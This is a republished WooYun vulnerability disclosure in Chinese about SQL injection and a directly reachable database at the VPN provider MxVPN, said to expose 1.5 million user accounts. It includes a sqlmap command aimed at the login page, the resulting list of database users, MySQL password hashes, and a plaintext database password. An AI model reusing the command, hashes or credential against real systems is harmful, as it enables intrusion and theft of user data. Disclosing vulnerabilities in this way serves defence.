MxVPN一处注入且数据库对外直连涉及150万用户名/密码/邮箱

admin 2017年5月4日08:20:26评论971 views字数 241阅读0分48秒阅读模式
摘要

2016-04-06: 细节已通知厂商并且等待厂商处理中
2016-04-08: 厂商已经确认,细节仅向厂商公开
2016-04-18: 细节向核心白帽子及相关领域专家公开
2016-04-28: 细节向普通白帽子公开
2016-05-08: 细节向实习白帽子公开
2016-05-23: 细节向公众公开

漏洞概要 关注数(14) 关注此漏洞

缺陷编号: WooYun-2016-191867

漏洞标题: MxVPN一处注入且数据库对外直连涉及150万用户名/密码/邮箱

相关厂商: MxVPN

漏洞作者: 路人甲

提交时间: 2016-04-06 02:10

公开时间: 2016-05-23 19:40

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 15

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无


漏洞详情

披露状态:

2016-04-06: 细节已通知厂商并且等待厂商处理中
2016-04-08: 厂商已经确认,细节仅向厂商公开
2016-04-18: 细节向核心白帽子及相关领域专家公开
2016-04-28: 细节向普通白帽子公开
2016-05-08: 细节向实习白帽子公开
2016-05-23: 细节向公众公开

简要描述:

rt

详细说明:

 

MxVPN一处注入且数据库对外直连涉及150万用户名/密码/邮箱

 

MxVPN一处注入且数据库对外直连涉及150万用户名/密码/邮箱

 

code 区域
:~/sqlmap# python sqlmap.py -u "**.**.**.**/radiusmanager/login/LoginFrom2.php" --data "username=520141&password=penghuier08"
          _
  back-end DBMS: MySQL 5.0.12
 banner:    '5.1.73-log'
 current user:    ''
 current database:    'radius'
 hostname:    '**.**.**.**'
 current user is DBA:    True
 database management system users [10]:
 [*] 'agents'@'localhost'
 [*] 'conntrack'@'localhost'
 [*] 'dingmuqi'@'%'
 [*] 'dingmuqi'@'localhost'
 [*] 'ftp'@'localhost'
 [*] 'inwome'@'%'
 [*] 'luntan'@'localhost'
 [*] 'radius'@'localhost'
 [*] 'root'@'**.**.**.**'
 [*] 'root'@'localhost'

 

漏洞证明:

 

code 区域
current user:    ''
 database management system users password hashes:
 [*] agents [1]:
     password hash: *94FF26AAEED28900EFF1A44336483DE6DBB04655
 [*] conntrack [1]:
     password hash: *0A12081373E1960FC60B5D552F0DDAEDC794577E
 [*] dingmuqi [1]:
     password hash: *74C7810C9BEC4DE02A10F57D633B7696B710F319
 [*] ftp [1]:
     password hash: *7962D4F1716AE22E2E885B21BB629A866F4A3827
 [*] inwome [1]:
     password hash: *F4256D736049CCDE506CCF5AB5E720E213F23B0D
 [*] luntan [1]:
     password hash: *9124EB089FA3DC00278CB80B94D7D43509A4859E
 [*] radius [1]:
     password hash: *10C12F28B6743FED91568B7837C158CBEADC7660
 [*] root [1]:
     password hash: *3FCDAA9A57AA494D9D0DB2F0773EB6A775723C5D

 

code 区域
inwome 密码  mima123..

直连
MxVPN一处注入且数据库对外直连涉及150万用户名/密码/邮箱

 

MxVPN一处注入且数据库对外直连涉及150万用户名/密码/邮箱

 

MxVPN一处注入且数据库对外直连涉及150万用户名/密码/邮箱

 

MxVPN一处注入且数据库对外直连涉及150万用户名/密码/邮箱

 

修复方案:

 

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-04-08 19:30

厂商回复:

所述网站非备案增值电信业务企业,暂未建立联系渠道,待认领。

最新状态:

暂无


k) $(n).removeClass("on"); }); $("#ratingShow").html($(this).attr("data-title")); }, function(){ $(this).removeClass("hover"); if($("#myRating").val()==""){ $.each(ratingItems,function(i,n){ $(n).removeClass("on"); }); } $("#ratingShow").html(""); } ); $(".myrating span").click(function(){ var rating=$(this).attr("rel"); var k=parseInt($(this).attr("rel")); $.post("/ajaxdo.php?module=bugrating",{"id":bugid,"rating":rating,"token":$("#token").val()},function(re){ //消除操作绑定 $(".myrating span").unbind(); re=parseInt(re); switch(re){ case 1: $("#ratingShow").html(_LANGJS.RATING_SUCCESS); $("#ratingSpan").html(parseInt($("#ratingSpan").html())+1); $.each(ratingItems,function(i,n){ var nk=parseInt($(n).attr("rel")); if(nk<=k){ $(n).addClass("on"); }else{ $(n).removeClass("on"); } }); ShowBugRating(rating); break; case 2: $("#ratingShow").html(_LANGJS.LOGIN_FIRST); break; case 4: $("#ratingShow").html(_LANGJS.RATING_BUGS_DONE); break; case 6: $("#ratingShow").html(_LANGJS.RATING_BUGS_SELF); break; default:break; } }); }); }else{ if(ratingCount>2){ ShowBugRating(bugRating); }else{ ShowBugRating(-3); } } });

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分


评价

  1. 2016-04-06 07:59 | 我在不想理你 ( 普通白帽子 | Rank:203 漏洞数:60 | 人生路漫漫)

    1

    666

  2. 2016-05-24 09:57 | kevino ( 路人 | Rank:2 漏洞数:1 | 欧拉欧拉欧拉)

    0

    意思是我该改密码了吗... 还好我在去年网易那事儿时候就改了,这边的密码已经不用了

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年5月4日08:20:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   MxVPN一处注入且数据库对外直连涉及150万用户名/密码/邮箱http://cn-sec.com/archives/16331.html

发表评论

匿名网友 填写信息